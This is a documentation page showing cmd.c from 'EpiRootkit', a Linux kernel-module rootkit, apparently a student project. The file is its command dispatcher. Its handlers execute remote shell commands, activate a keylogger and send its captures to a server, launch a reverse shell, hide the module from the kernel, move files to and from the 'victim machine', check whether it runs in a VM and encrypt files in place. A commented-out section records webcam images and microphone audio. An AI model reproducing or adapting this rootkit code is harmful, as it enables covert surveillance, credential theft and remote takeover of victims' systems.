EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
cmd.c
Go to the documentation of this file.
1#include <linux/delay.h>
2#include <linux/fs.h>
3#include <linux/kernel.h>
4#include <linux/kmod.h>
5#include <linux/mm.h>
6#include <linux/module.h>
7#include <linux/sched.h>
8#include <linux/slab.h>
9#include <linux/string.h>
10#include <linux/uaccess.h>
11#include <linux/utsname.h>
12#include <linux/vmalloc.h>
13
14#include "crypto.h"
15#include "download.h"
16#include "epirootkit.h"
17#include "io.h"
18#include "menu.h"
19#include "passwd.h"
20#include "sysinfo.h"
21#include "upload.h"
22#include "vanish.h"
23
24extern struct socket *get_worker_socket(void);
25
26// Handler prototypes
27static int connect_handler(char *args, enum Protocol protocol);
28static int disconnect_handler(char *args, enum Protocol protocol);
29static int ping_handler(char *args, enum Protocol protocol);
30static int change_password_handler(char *args, enum Protocol protocol);
31static int exec_handler(char *args, enum Protocol protocol);
32static int klgon_handler(char *args, enum Protocol protocol);
33static int klgoff_handler(char *args, enum Protocol protocol);
34static int klg_handler(char *args, enum Protocol protocol);
35static int getshell_handler(char *args, enum Protocol protocol);
36static int killcom_handler(char *args, enum Protocol protocol);
37static int hide_module_handler(char *args, enum Protocol protocol);
38static int unhide_module_handler(char *args, enum Protocol protocol);
39static int help_handler(char *args, enum Protocol protocol);
40// static int start_webcam_handler(char *args, enum Protocol protocol);
41// static int capture_image_handler(char *args, enum Protocol protocol);
42// static int start_microphone_handler(char *args, enum Protocol protocol);
43// static int play_audio_handler(char *args, enum Protocol protocol);
44static int sysinfo_handler(char *args, enum Protocol protocol);
45static int is_in_vm_handler(char *args, enum Protocol protocol);
46static int cipher_handler(char *args, enum Protocol protocol);
47static int uncipher_handler(char *args, enum Protocol protocol);
48
49static struct command rootkit_commands_array[] = {
50 { "connect", 7, "unlock access to rootkit. Usage: connect [password]", 51,
51 connect_handler },
52 { "disconnect", 10, "disconnect user", 15, disconnect_handler },
53 { "ping", 4, "ping the rootkit", 16, ping_handler },
54 { "passwd", 6, "change rootkit password. Usage: passwd NEW_PASSWORD", 51,
55 change_password_handler },
56 { "exec", 4,
57 "execute a shell command. Usage: exec [-s for silent mode] [args*]", 65,
58 exec_handler },
59 { "klgon", 6, "activate keylogger", 18, klgon_handler },
60 { "klgoff", 7, "deactivate keylogger", 20, klgoff_handler },
61 { "klg", 3, "send keylogger content to server", 32, klg_handler },
62 { "getshell", 8, "launch reverse shell", 20, getshell_handler },
63 { "killcom", 7, "exit the module", 15, killcom_handler },
64 { "hide_module", 11, "hide the module from the kernel", 31,
65 hide_module_handler },
66 { "unhide_module", 13, "unhide the module in the kernel", 31,
67 unhide_module_handler },
68 { "help", 4, "display this help message", 25, help_handler },
69 // { "start_webcam", 11, "activate webcam", 15, start_webcam_handler },
70 // { "capture_image", 13, "capture an image with the webcam", 32,
71 // capture_image_handler }, { "start_microphone", 15, "start recording
72 // from microphone", 31, start_microphone_handler }, { "play_audio", 10,
73 // "play an audio file", 18, play_audio_handler },
74 { "hooks", 5, "manage hide/forbid/alter rules", 30, hooks_menu_handler },
75 { "upload", 6, "receive a file and save it on disk", 34, upload_handler },
76 { "download", 8, "download a file from victim machine", 35,
77 download_handler },
78 { "sysinfo", 7, "get system information in JSON format", 37,
79 sysinfo_handler },
80 { "is_in_vm", 8, "check if remote rootkit is running in vm", 40,
81 is_in_vm_handler },
82 { "cipher", 6, "cipher the file in parameter", 29, cipher_handler },
83 { "uncipher", 8, "uncipher the file in parameter", 31, uncipher_handler },
84 { NULL, 0, NULL, 0, NULL }
85};
86
87static int is_in_vm_handler(char *args, enum Protocol protocol) {
88 (void)args;
89
90 if (is_running_in_virtual_env()) {
91 send_to_server(protocol,
92 "[YES] The rootkit is running in a virtual machine.\n");
93 }
94 else {
95 send_to_server(protocol,
96 "[NOP] The rootkit is not running in a virtual machine.\n");
97 }
98 return SUCCESS;
99}
100
101static int help_handler(char *args, enum Protocol protocol) {
102 int i;
103 char *help_msg = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
104 int offset = snprintf(help_msg, STD_BUFFER_SIZE, "Available commands:\n");
105 for (i = 0; rootkit_commands_array[i].cmd_name != NULL; i++) {
106 offset += snprintf(help_msg + offset, STD_BUFFER_SIZE - offset,
107 "\t - %s: %s\n", rootkit_commands_array[i].cmd_name,
108 rootkit_commands_array[i].cmd_desc);
109 if (offset >= STD_BUFFER_SIZE) {
110 ERR_MSG("help_handler: help message truncated\n");
111 break;
112 }
113 }
114
115 send_to_server(protocol, help_msg);
116
117 kfree(help_msg);
118
119 return 0;
120}
121
122int rootkit_command(char *command, unsigned command_size,
123 enum Protocol protocol) {
124 // Handle ongoing download
125 if (download(command) == 0) {
126 return 0;
127 }
128
129 // Strip trailing newline if present
130 command[strcspn(command, "\n")] = '\0';
131
132 // Validate null termination
133 DBG_MSG("rootkit_command: received command: \"%s\"\n", command);
134 if (command[command_size - 1] != '\0') {
135 ERR_MSG("rootkit_command: command is not null-terminated\n");
136 return -EINVAL;
137 }
138
139 // Allow these commands without authentication
140 const char *allowed_commands[] = { "connect", "help", "ping", NULL };
141
142 if (!is_user_auth()) {
143 int allowed = 0;
144 for (int i = 0; allowed_commands[i] != NULL; i++) {
145 if (strncmp(command, allowed_commands[i], strlen(allowed_commands[i])) == 0) {
146 allowed = 1;
147 break;
148 }
149 }
150
151 if (!allowed) {
152 send_to_server(protocol, "Authentication required. Use the 'connect' "
153 "command to authenticate.\n");
154 ERR_MSG("rootkit_command: unauthorized command without authentication\n");
155 return -FAILURE;
156 }
157 }
158
159 // Match command against registered handlers
160 for (int i = 0; rootkit_commands_array[i].cmd_name != NULL; i++) {
161 if (strncmp(command, rootkit_commands_array[i].cmd_name,
162 rootkit_commands_array[i].cmd_name_size)
163 == 0) {
164 char *args = command + rootkit_commands_array[i].cmd_name_size;
165 while (*args == ' ')
166 args++;
167 return rootkit_commands_array[i].cmd_handler(args, protocol);
168 }
169 }
170
171 // Unknown command
172 ERR_MSG("rootkit_command: unknown command \"%s\"\n", command);
173 send_to_server(protocol, "Unknown command\n");
174 return -EINVAL;
175}
176
177static int change_password_handler(char *args, enum Protocol protocol) {
178 if (!args || !*args) {
179 send_to_server(protocol, "Usage: passwd NEW_PASSWORD\n");
180 return -EINVAL;
181 }
182
183 // Check spaces
184 for (char *p = args; *p; p++) {
185 if (*p == ' ') {
186 send_to_server(protocol, "Password must not contain spaces\n");
187 return -EINVAL;
188 }
189 }
190
191 int ret = passwd_set(args);
192 if (ret < 0) {
193 ERR_MSG("change_password_handler: failed to set password: %d\n", ret);
194 send_to_server(protocol, "Failed to set password\n");
195 return ret;
196 }
197
198 send_to_server(protocol, "Password updated\n");
199 return SUCCESS;
200}
201
202static int connect_handler(char *args, enum Protocol protocol) {
203 if (is_user_auth()) {
204 send_to_server(protocol, "You are already authentificated.\n");
205 return true;
206 }
207
208 DBG_MSG("connect_handler: verifying password received: %s...\n", args);
209
210 int pv = passwd_verify(args);
211 if (pv < 0) {
212 ERR_MSG("connect_handler: error verifying password: %d\n", pv);
213 return pv;
214 }
215
216 if (pv == 1) {
217 set_user_auth(true);
218 DBG_MSG("connect_handler: user authenticated\n");
219 send_to_server(protocol, "User authenticated.\n");
220 return true;
221 }
222 else {
223 set_user_auth(false);
224 ERR_MSG("connect_handler: invalid password\n");
225 send_to_server(protocol, "Invalid password.\n");
226 msleep(2 * TIMEOUT_BEFORE_RETRY);
227 return false;
228 }
229}
230
231static int disconnect_handler(char *args, enum Protocol protocol) {
232 set_user_auth(false);
233 send_to_server(protocol, "User successfully disconnected.\n");
234 return false;
235}
236
237static int ping_handler(char *args, enum Protocol protocol) {
238 send_to_server(protocol, "pong\n");
239 return SUCCESS;
240}
241
242static int exec_handler(char *args, enum Protocol protocol) {
243 bool catch_stds = true;
244
245 // If first non whitespace character is '-s', set catch_stds to false
246 args += strspn(args, " \t");
247 if (strncmp(args, "-s ", 3) == 0) {
248 catch_stds = false;
249 args += 3; // Skip the '-s ' part
250 }
251
252 // Extract the command from the received message
253 char *command = args;
254 command[strcspn(command, "\n")] = '\0';
255 DBG_MSG("exec_handler: executing command: %s\n", command);
256
257 // Execute the command
258 int ret_code = exec_str_as_command(command, catch_stds);
259 ret_code = ret_code >> 8;
260 DBG_MSG("exec_handler: command executed with return code: %d\n", ret_code);
261 if (ret_code < 0) {
262 ERR_MSG("exec_handler: failed to execute command\n");
263 return ret_code;
264 }
265
266 if (catch_stds) {
267 char stdout_msg[] = "stdout:\n";
268 int stdout_buff_size = 0;
269 char *stdout_buff;
270 stdout_buff_size = _read_file(STDOUT_FILE, &stdout_buff);
271
272 char stderr_msg[] = "stderr:\n";
273 int stderr_buff_size = 0;
274 char *stderr_buff;
275 stderr_buff_size = _read_file(STDERR_FILE, &stderr_buff);
276
277 if (stdout_buff_size < 0 || stderr_buff_size < 0) {
278 ERR_MSG("exec_handler: failed to read stdout or stderr files\n");
279 send_to_server(protocol, "Failed to read stdout or stderr files\n");
280 if (stdout_buff)
281 kfree(stdout_buff);
282 if (stderr_buff)
283 kfree(stderr_buff);
284 return -EIO;
285 }
286
287 char code_msg[32] = { 0 };
288 snprintf(code_msg, sizeof(code_msg), "Terminated with code: %d\n",
289 ret_code);
290
291 char *output_msg =
292 kmalloc(stdout_buff_size + stderr_buff_size + sizeof(stdout_msg) + sizeof(stderr_msg) + sizeof(code_msg),
293 GFP_KERNEL);
294 if (!output_msg) {
295 ERR_MSG("exec_handler: failed to allocate memory for output message\n");
296 kfree(stdout_buff);
297 kfree(stderr_buff);
298 return -ENOMEM;
299 }
300 snprintf(output_msg,
301 stdout_buff_size + stderr_buff_size + sizeof(stdout_msg) + sizeof(stderr_msg) + sizeof(code_msg),
302 "%s%s%s%s%s", stdout_msg, stdout_buff, stderr_msg, stderr_buff,
303 code_msg);
304
305 send_to_server(protocol, output_msg);
306 kfree(output_msg);
307 kfree(stdout_buff);
308 kfree(stderr_buff);
309 }
310 else {
311 // If not catching stds, just send the return code
312 char ret_code_msg[32] = { 0 };
313 snprintf(ret_code_msg, sizeof(ret_code_msg), "Terminated with code: %d\n",
314 ret_code);
315 send_to_server(protocol, ret_code_msg);
316 }
317
318 return ret_code;
319}
320
321static int klgon_handler(char *args, enum Protocol protocol) {
322 int ret_code = epikeylog_init();
323 if (ret_code < 0) {
324 ERR_MSG("klgon_handler: failed to activate keylogger\n");
325 send_to_server(protocol, "");
326 return ret_code;
327 }
328 send_to_server(protocol, "keylogger activated\n");
329 DBG_MSG("klgon_handler: keylogger activated\n");
330 return ret_code;
331}
332
333static int klgoff_handler(char *args, enum Protocol protocol) {
334 int ret_code = epikeylog_exit();
335 if (ret_code < 0) {
336 ERR_MSG("klgoff_handler: failed to deactivate keylogger\n");
337 send_to_server(protocol, "");
338 return ret_code;
339 }
340 send_to_server(protocol, "keylogger desactivated\n");
341 DBG_MSG("klgoff_handler: keylogger desactivated\n");
342 return ret_code;
343}
344
345static int klg_handler(char *args, enum Protocol protocol) {
346 int ret_code = epikeylog_send_to_server();
347 if (ret_code < 0) {
348 ERR_MSG("klg_handler: failed to send keylogger content\n");
349 send_to_server(protocol, "");
350 return ret_code;
351 }
352 DBG_MSG("klg_handler: keylogger content sent\n");
353 return ret_code;
354}
355
356static int getshell_handler(char *args, enum Protocol protocol) {
357 // remove all trailing space in args
358 args += strspn(args, " \t");
359 args[strcspn(args, "\n")] = '\0';
360 // check if all chars are numbers
361 if (args[0] == '\0') {
362 DBG_MSG("getshell_handler: no port specified, using default port %d\n",
363 REVERSE_SHELL_PORT);
364 args = "0";
365 }
366 long shellport = simple_strtol(args, NULL, 10);
367 if (shellport < 0 || shellport > 65535) {
368 ERR_MSG("getshell_handler: invalid port number %ld\n", shellport);
369 send_to_server(protocol, "Invalid port number\n");
370 return -EINVAL;
371 }
372
373 // Lancer le reverse shell avec le port spécifié
374 int ret_code = launch_reverse_shell(args);
375
376 if (ret_code < 0) {
377 ERR_MSG("getshell_handler: failed to launch reverse shell on port %ld\n",
378 shellport);
379 send_to_server(protocol, "Failed to launch reverse shell\n");
380 }
381
382 else
383 send_to_server(protocol,
384 "Reverse shell launched successfully on port %ld\n",
385 shellport);
386
387 return ret_code;
388}
389
390static int killcom_handler(char *args, enum Protocol protocol) {
391 DBG_MSG("killcom_handler: killcom received, exiting...\n");
392
393 // The module will be removed by the usermode helper
394 static char *argv[] = { "/usr/sbin/rmmod", "epirootkit", NULL };
395 static char *envp[] = { "HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };
396
397 // Unhiding module...
398 unhide_module();
399 int ret_code = unhide_module();
400 if (ret_code < 0) {
401 ERR_MSG("unhide_module_handler: failed to unhide module\n");
402 return ret_code;
403 }
404
405 DBG_MSG("killcom_handler: calling rmmod from usermode...\n");
406
407 call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
408
409 return 0;
410}
411
412static int hide_module_handler(char *args, enum Protocol protocol) {
413 DBG_MSG("hide_module_handler: hiding module\n");
414 int ret_code = hide_module();
415 if (ret_code < 0) {
416 ERR_MSG("hide_module_handler: failed to hide module\n");
417 }
418 return ret_code;
419}
420
421static int unhide_module_handler(char *args, enum Protocol protocol) {
422 DBG_MSG("unhide_module_handler: unhiding module\n");
423 int ret_code = unhide_module();
424 if (ret_code < 0) {
425 ERR_MSG("unhide_module_handler: failed to unhide module\n");
426 }
427 return ret_code;
428}
429
430/*
431static int start_webcam_handler(char *args, enum Protocol protocol) {
432 DBG_MSG("start_webcam_handler: starting webcam to capture an image\n");
433 static char *argv[] = { "/usr/bin/ffmpeg", "-f", "v4l2", "-i",
434"/dev/video0", "-t", "00:00:10", "-s", "640x480", "-f", "image2",
435"/tmp/capture.jpg", NULL }; static char *envp[] = { "HOME=/",
436"PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };
437
438 int ret_code = call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
439 if (ret_code < 0) {
440 ERR_MSG("start_webcam_handler: failed to start webcam\n");
441 return ret_code;
442 }
443 DBG_MSG("start_webcam_handler: webcam started successfully, image
444captured\n"); send_to_server(protocol, "Webcam activated and image captured\n");
445 return SUCCESS;
446}
447
448static int capture_image_handler(char *args, enum Protocol protocol) {
449 DBG_MSG("capture_image_handler: capturing an image from the webcam\n");
450 static char *argv[] = { "/usr/bin/ffmpeg", "-f", "v4l2", "-i",
451"/dev/video0", "-t", "00:00:10", "-s", "640x480", "-f", "image2",
452"/tmp/capture.jpg", NULL }; static char *envp[] = { "HOME=/",
453"PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };
454
455 int ret_code = call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
456 if (ret_code < 0) {
457 ERR_MSG("capture_image_handler: failed to capture image\n");
458 return ret_code;
459 }
460 DBG_MSG("capture_image_handler: image captured successfully, saved at
461/tmp/capture.jpg\n"); send_to_server(protocol, "Captured image saved at
462/tmp/capture.jpg\n");
463
464
465 // Copy the image to a directory accessible by Flask
466 // For example, to /var/www/html/images/ on the server
467 int copy_ret_code = system("cp /tmp/capture.jpg
468/var/www/html/images/capture.jpg"); if (copy_ret_code < 0) {
469 ERR_MSG("capture_image_handler: failed to copy image to web accessible
470directory\n"); return copy_ret_code;
471 }
472
473 return SUCCESS;
474}
475
476static int start_microphone_handler(char *args, enum Protocol protocol) {
477 DBG_MSG("start_microphone_handler: starting microphone recording\n");
478 static char *argv[] = { "/usr/bin/arecord", "-D", "plughw:1,0", "-f", "cd",
479"-t", "wav", "-d", "10", "/tmp/audio.wav", NULL }; static char *envp[] = {
480"HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };
481
482 int ret_code = call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
483 if (ret_code < 0) {
484 ERR_MSG("start_microphone_handler: failed to start microphone\n");
485 return ret_code;
486 }
487 DBG_MSG("start_microphone_handler: microphone recording started
488successfully, audio saved at /tmp/audio.wav\n"); send_to_server(protocol,
489"Microphone activated and audio recorded\n"); return SUCCESS;
490}
491
492static int play_audio_handler(char *args, enum Protocol protocol) {
493 DBG_MSG("play_audio_handler: playing audio file from /tmp/audio.wav\n");
494 static char *argv[] = { "/usr/bin/aplay", "/tmp/audio.wav", NULL };
495 static char *envp[] = { "HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL
496};
497
498 int ret_code = call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
499 if (ret_code < 0) {
500 ERR_MSG("play_audio_handler: failed to play audio\n");
501 return ret_code;
502 }
503 DBG_MSG("play_audio_handler: audio played successfully\n");
504 send_to_server(protocol, "Audio played\n");
505 return SUCCESS;
506}
507*/
508
509static int sysinfo_handler(char *args, enum Protocol protocol) {
510 char *info = get_sysinfo();
511 if (!info) {
512 send_to_server(protocol, "{error: Failed to retrieve system information}");
513 return -ENOMEM;
514 }
515
516 send_to_server(protocol, info);
517 kfree(info);
518 return 0;
519}
520
521static int cipher_handler(char *args, enum Protocol protocol) {
522 // Read file
523 char *buffer = NULL;
524 int result = 0;
525
526 if ((result = _read_file(args, &buffer)) < 0)
527 goto end;
528
529 // Cipher buffer
530 char *encrypted_buffer = NULL;
531 size_t encrypted_len = 0;
532
533 if ((result = encrypt_buffer(buffer, result, &encrypted_buffer, &encrypted_len) < 0))
534 goto end;
535
536 // Write data into file
537 if ((result = _write_file(args, encrypted_buffer, encrypted_len)) < 0)
538 goto end;
539
540end:
541 if (result < 0) {
542 send_to_server(protocol, "cipher: Error while ciphering file.");
543 return result;
544 }
545
546 send_to_server(protocol, "File successfully ciphered.");
547 return result;
548}
549
550static int uncipher_handler(char *args, enum Protocol protocol) {
551 // Read file
552 char *encrypted_buffer = NULL;
553 int result = 0;
554
555 if ((result = _read_file(args, &encrypted_buffer)) < 0)
556 goto end;
557
558 // Uncipher buffer
559 char *decrypted_buffer = NULL;
560 size_t decrypted_len = 0;
561
562 if ((result = decrypt_buffer(encrypted_buffer, result, &decrypted_buffer, &decrypted_len) < 0))
563 goto end;
564
565 // Write data into file
566 if ((result = _write_file(args, decrypted_buffer, decrypted_len)) < 0)
567 goto end;
568
569end:
570 if (result < 0) {
571 send_to_server(protocol, "cipher: Error while unciphering file.");
572 return result;
573 }
574
575 send_to_server(protocol, "File successfully unciphered.");
576 return result;
577}
encrypt_buffer
int encrypt_buffer(const char *in, size_t in_len, char **out, size_t *out_len)
Encrypts a buffer using AES-128 in CBC mode.
Definition aes.c:322
decrypt_buffer
int decrypt_buffer(const char *in, size_t in_len, char **out, size_t *out_len)
Decrypts a buffer using AES-128 in CBC mode.
Definition aes.c:335
hide_module_handler
static int hide_module_handler(char *args, enum Protocol protocol)
Definition cmd.c:412
klg_handler
static int klg_handler(char *args, enum Protocol protocol)
Definition cmd.c:345
help_handler
static int help_handler(char *args, enum Protocol protocol)
Definition cmd.c:101
connect_handler
static int connect_handler(char *args, enum Protocol protocol)
Definition cmd.c:202
exec_handler
static int exec_handler(char *args, enum Protocol protocol)
Definition cmd.c:242
rootkit_commands_array
static struct command rootkit_commands_array[]
Definition cmd.c:49
is_in_vm_handler
static int is_in_vm_handler(char *args, enum Protocol protocol)
Definition cmd.c:87
getshell_handler
static int getshell_handler(char *args, enum Protocol protocol)
Definition cmd.c:356
change_password_handler
static int change_password_handler(char *args, enum Protocol protocol)
Definition cmd.c:177
get_worker_socket
struct socket * get_worker_socket(void)
Definition socket.c:17
cipher_handler
static int cipher_handler(char *args, enum Protocol protocol)
Definition cmd.c:521
rootkit_command
int rootkit_command(char *command, unsigned command_size, enum Protocol protocol)
Definition cmd.c:122
unhide_module_handler
static int unhide_module_handler(char *args, enum Protocol protocol)
Definition cmd.c:421
ping_handler
static int ping_handler(char *args, enum Protocol protocol)
Definition cmd.c:237
uncipher_handler
static int uncipher_handler(char *args, enum Protocol protocol)
Definition cmd.c:550
klgon_handler
static int klgon_handler(char *args, enum Protocol protocol)
Definition cmd.c:321
killcom_handler
static int killcom_handler(char *args, enum Protocol protocol)
Definition cmd.c:390
klgoff_handler
static int klgoff_handler(char *args, enum Protocol protocol)
Definition cmd.c:333
sysinfo_handler
static int sysinfo_handler(char *args, enum Protocol protocol)
Definition cmd.c:509
disconnect_handler
static int disconnect_handler(char *args, enum Protocol protocol)
Definition cmd.c:231
TIMEOUT_BEFORE_RETRY
#define TIMEOUT_BEFORE_RETRY
Definition config.h:36
STDOUT_FILE
#define STDOUT_FILE
Definition config.h:57
ERR_MSG
#define ERR_MSG(fmt, args...)
Definition config.h:16
STDERR_FILE
#define STDERR_FILE
Definition config.h:58
DBG_MSG
#define DBG_MSG(fmt, args...)
Definition config.h:15
FAILURE
#define FAILURE
Definition config.h:6
SUCCESS
#define SUCCESS
Definition config.h:5
Protocol
Protocol
Definition config.h:28
STD_BUFFER_SIZE
#define STD_BUFFER_SIZE
Definition config.h:68
REVERSE_SHELL_PORT
#define REVERSE_SHELL_PORT
Definition config.h:25
download_handler
int download_handler(char *args, enum Protocol protocol)
Definition download.c:24
epikeylog_send_to_server
int epikeylog_send_to_server(void)
Handles sending the keylogger buffer content to the remote server.
Definition epikeylog.c:245
epikeylog_init
int epikeylog_init()
Initializes the keylogger module.
Definition epikeylog.c:325
epikeylog_exit
int epikeylog_exit(void)
Exits the keylogger module, unregisters the notifier, and cleans up.
Definition epikeylog.c:363
exec_str_as_command
#define exec_str_as_command(user_cmd, catch_stds)
Definition epirootkit.h:37
hide_module
int hide_module(void)
Definition ghost.c:7
unhide_module
int unhide_module(void)
Definition ghost.c:24
launch_reverse_shell
int launch_reverse_shell(char *args)
Definition socat.c:83
_write_file
int _write_file(const char *path, const char *buf, size_t len)
Definition io.c:67
_read_file
int _read_file(const char *path, char **out_buf)
Definition io.c:12
hooks_menu_handler
int hooks_menu_handler(char *args, enum Protocol protocol)
Definition menu.c:289
send_to_server
int send_to_server(enum Protocol protocol, char *message,...)
Definition network.c:67
set_user_auth
int set_user_auth(bool auth)
Definition tcp/worker.c:22
is_user_auth
bool is_user_auth(void)
Definition tcp/worker.c:13
passwd_set
int passwd_set(const char *new_password)
Set a new password by updating the stored hash.
Definition passwd.c:73
passwd_verify
int passwd_verify(const char *password)
Verify the provided password against the stored hash.
Definition passwd.c:57
command::cmd_desc
char * cmd_desc
Definition epirootkit.h:29
command::cmd_name
char * cmd_name
Definition epirootkit.h:27
command::cmd_name_size
unsigned cmd_name_size
Definition epirootkit.h:28
command::cmd_handler
int(* cmd_handler)(char *args, enum Protocol protocol)
Definition epirootkit.h:31
get_sysinfo
char * get_sysinfo(void)
Definition sysinfo.c:18
upload_handler
int upload_handler(char *args, enum Protocol protocol)
Definition upload.c:101
is_running_in_virtual_env
bool is_running_in_virtual_env(void)
Determines if the system is running in a virtualized environment.
Definition vanish.c:55